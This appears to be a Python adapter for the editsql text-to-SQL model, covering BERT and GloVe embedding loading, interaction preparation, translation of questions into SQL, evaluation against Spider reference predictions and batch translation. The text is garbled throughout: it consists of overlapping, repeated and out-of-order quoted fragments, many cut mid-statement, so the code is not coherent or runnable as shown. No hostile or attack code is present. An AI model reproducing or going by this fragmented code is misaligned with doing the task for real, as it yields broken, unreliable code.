amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] =", "references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw =", "= map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb ==", "_EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema", "'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or", "dicts with values for nl_question and db_id output_dir: path of dir where the", "glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token", "[nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def", "InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question,", "data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model", "predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] #", "'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb ==", "\" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed =", "translation comparisons.append(comparison) end = time.time() duration = end - start time_per_item = duration", "preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use", "\"\" example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy", "post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate", "fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill", "comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq", "torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the", "create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading function", "from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from", "# fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"]", "output_dir) def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with", "\".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"])", "= references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if", "the database id \"\"\" # establish the structure of an interaction in raw", "[] num_errors = 0 start = time.time() for i in sample_indices: db_id =", "import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate arbitrary", "# define a modified embeddings loading function that makes use of the preloaded", "# strip the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self,", "- start time_per_item = duration / amount num_correct = amount - num_errors accuracy", "dir where the translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as", "vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint',", "== 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case = True", "# overwrite the original embeddings loading function with the modified version model.load_word_embeddings =", "import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import setup_util from api.paths", "map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return", "k=amount) else: sample_indices = range(amount) comparisons = [] num_errors = 0 start =", "gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in gold) dev_pred_norm =", "return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading function with", "tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else:", "if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] =", "the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with absolute", "file \" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\"", "* from api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses", "self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the", "def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16',", "or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case = True no_pretraining =", "loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified", "distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in", "num_correct = amount - num_errors accuracy = num_correct * 100 / amount eval_output", "= self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict", "those with errors use_gold_query: comparison with the gold queries from spider instead of", "previous predictions Returns: an InteractionItem that contains the natural language question and the", "amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. By default", "the results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in gold)", "preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return", "num_errors += 1 if is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"]", "modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with absolute path", "\" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and prevent numbering from distorting", "the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction =", "return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema:", "not amount: # let amount default to _all_ examples from the file amount", "model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original function with the modified", "arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params,", "= duration / amount num_correct = amount - num_errors accuracy = num_correct *", "''.join(\"0\" if c.isdigit() else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if", "atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model,", "nl_questions: the natural language questions db_id: the database that acts as context prev_predictions:", "used for loading of interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer,", "interaction Args: nl_question: the natural language question db_id: the database that acts as", "len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if", "glove_oov = 0 para_oov = 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token)", "= 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings:", "= torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite", "= prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return", "relative path in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\")", "editsql \"\"\" # load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as", "translation_norm != dev_pred_norm if is_error: num_errors += 1 if is_error or show_all: comparison", "params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset and model", "# normalize and prevent numbering from distorting the results gold_norm = ''.join(\"0\" if", "dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in dev_prediction) translation_norm =", "if is_error: num_errors += 1 if is_error or show_all: comparison = dict() comparison[\"identifier\"]", "input file and save the translations to a file in the output directory", "with open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define a", "model data = ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE,", "or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case", "from api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the", "from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from", "natural language questions db_id: the database that acts as context prev_predictions: the previous", "of dir where the translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file)", "to _all_ examples from the file amount = len(references) # determine the instances", "glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV',", "output directory Args: input_file: path of file with list of dicts with values", "bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\")", "example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\"", "of dicts with values for nl_question and db_id from the input file and", "+ \".json\" with open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4) #", "example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int =", "utterance in an interaction Args: nl_question: the natural language question db_id: the database", "item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"] = accuracy if show_all:", "= vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token in vocabulary_tokens: token_id", "do_lower_case = False else: do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH,", "else: do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file =", "\"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset and", "json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def", "db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next utterance in an", "dev_pred_norm if is_error: num_errors += 1 if is_error or show_all: comparison = dict()", "the database id Args: nl_questions: the natural language questions db_id: the database that", "sql for the next utterance in an interaction Args: nl_question: the natural language", "the natural language question db_id: the database that acts as context Returns: the", "dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill the general fields example[\"id\"]", "output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded glove ----------- glove_embeddings =", "model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device)", "the database that acts as context prev_predictions: the previous predictions Returns: an InteractionItem", "\" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates", "from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import setup_util", "id Args: nl_questions: the natural language questions db_id: the database that acts as", "import Path import numpy as np import json import torch from editsql.data_util import", "amount = len(references) # determine the instances to test on if randomness: sample_indices", "parse_args_sparc from adapters.editsql.constants import * from api import setup_util from api.paths import DB_SCHEMAS_FILE", "with the gold queries from spider Args: amount: the amount of samples to", "[(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to", "= [] num_errors = 0 start = time.time() for i in sample_indices: db_id", "arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params", "for nl_question and db_id output_dir: path of dir where the translations are saved", "= postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold =", "the gold queries from spider instead of the prediction results of standalone editsql", "to a file in the output directory Args: input_file: path of file with", "language question db_id: the database that acts as context Returns: the sql prediction", "the instances to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices", "tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants", "return model_bert, tokenizer, bert_config # overwrite the original function with the modified version", "schema) translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema)", "for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \"", "as infile: references = json.load(infile) if not amount: # let amount default to", "= in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql", "a modified version with absolute path instead of relative path in the first", "= parse_args_spider.interpret_args() # create the dataset and model data = ATISDataset(params) self.model =", "samples, not only those with errors use_gold_query: comparison with the gold queries from", "prev_predictions: the previous predictions or an empty list Returns: the sql prediction \"\"\"", "the raw interaction to an InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj)", "= tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint,", "vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token in vocabulary_tokens: token_id =", "output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings,", "import numpy as np import json import torch from editsql.data_util import atis_batch from", "Returns: the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction", "in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in dev_prediction)", "c.isdigit() else c.lower() for c in translation) if use_gold_query: is_error = translation_norm !=", "example[\"interaction\"] = [] # fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"]", "edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\")", "prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\"", "model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that", "else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original function with", "for c in translation) if use_gold_query: is_error = translation_norm != gold_norm else: is_error", "standalone editsql \"\"\" # load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE)", "'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS'", "eval_output[\"# items\"] = amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons", "dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold", "# ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the", "processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts", "False else: do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file", "editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import", "samples to use randomness: randomly choose samples show_all: write all samples, not only", "of editsql to translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if", "with the gold queries from spider instead of the prediction results of standalone", "the sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id,", "= SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None)", "state example = dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill the", "of standalone editsql \"\"\" # load the prediction results of standalone editsql with", "schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction,", "OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings", "raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\"", "if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case", "are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests = json.load(f)", "import json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from", "i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"]", "file with list of dicts with values for nl_question and db_id output_dir: path", "end = time.time() duration = end - start time_per_item = duration / amount", "normalize and prevent numbering from distorting the results gold_norm = ''.join(\"0\" if c.isdigit()", "fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q", "interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self,", "model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import", "the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42", "the gold queries from spider Args: amount: the amount of samples to use", "# define a modified version with absolute path instead of relative path in", "db_id: the database that acts as context prev_predictions: the previous predictions Returns: an", "editsql to translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if model", "= glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov", "parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config", "of interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self,", "------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation", "time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4)", "\"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring", "overwrite the original embeddings loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql", "editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig,", "editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization", "if c.isdigit() else c.lower() for c in translation) if use_gold_query: is_error = translation_norm", "amount: # let amount default to _all_ examples from the file amount =", "eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod", "# ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the", "tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu'))", "Args: nl_question: the natural language question db_id: the database that acts as context", "= translation_norm != dev_pred_norm if is_error: num_errors += 1 if is_error or show_all:", "enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory)", "= self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question,", "samples show_all: write all samples, not only those with errors use_gold_query: comparison with", "gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and prevent numbering", "in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1]", "prediction \"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction", "db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens =", "randomness: randomly choose samples show_all: write all samples, not only those with errors", "/ amount num_correct = amount - num_errors accuracy = num_correct * 100 /", "\"query to be predicted\" # transform the raw interaction to an InteractionItem obj,", "/ filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define a modified embeddings", "of EditsqlAdapter. By default the prediction results of standalone editsql act as the", "as outfile: json.dump(content, outfile, indent=4) # define a modified embeddings loading function that", "vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov =", "db_id: the database that acts as context Returns: the sql prediction \"\"\" #", "import read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel", "= random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = [] num_errors = 0", "language question db_id: the database that acts as context prev_nl_questions: the previous questions", "= self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize", "if is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not", "\"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the content fields", "load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded glove -----------", "questions into sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params =", "\"\"\" Evaluate the translation output of EditsqlAdapter. By default the prediction results of", "os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file',", "class EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate arbitrary questions into", "nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction)", "[] # fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\"", "on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons =", "parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import setup_util from api.paths import", "dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration = end - start", "with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount: # let amount", "def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter.", "= json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir)", "queries from spider Args: amount: the amount of samples to use randomness: randomly", "sql query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q,", "randomly choose samples show_all: write all samples, not only those with errors use_gold_query:", "c in translation) if use_gold_query: is_error = translation_norm != gold_norm else: is_error =", "read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of interaction in raw", "standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount: #", "get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS':", "postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold,", "token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov,", "= [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query", "__init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args()", "predictions Returns: an InteractionItem that contains the natural language question and the database", "return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\"", "else: sample_indices = range(amount) comparisons = [] num_errors = 0 start = time.time()", "num_errors = 0 start = time.time() for i in sample_indices: db_id = references[i][\"database_id\"]", "model == \"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the", "an empty list prev_predictions: the previous predictions or an empty list Returns: the", "test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons", "enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"]", "that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size", "absolute path instead of relative path in the first line def get_bert(params): BERT_PT_PATH", "Uses the functionality of editsql to translate arbitrary questions into sql \"\"\" def", "BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api", "def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the natural", "prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction,", "load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql translation", "that contains the natural language question and the database id Args: nl_questions: the", "load_model(self, params, data): \"\"\" Loads the editsql translation model Args: params: the parsed", "and the database id Args: nl_questions: the natural language questions db_id: the database", "= BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining:", "= db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(),", "gold queries from spider Args: amount: the amount of samples to use randomness:", "pred_str = \" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id]", "import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import", "the translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests", "prevent numbering from distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower()", "example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the", "self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of interaction", "context Returns: the sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction =", "as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from", "to use randomness: randomly choose samples show_all: write all samples, not only those", "Returns: the loaded SchemaInteractionATISModel \"\"\" model = 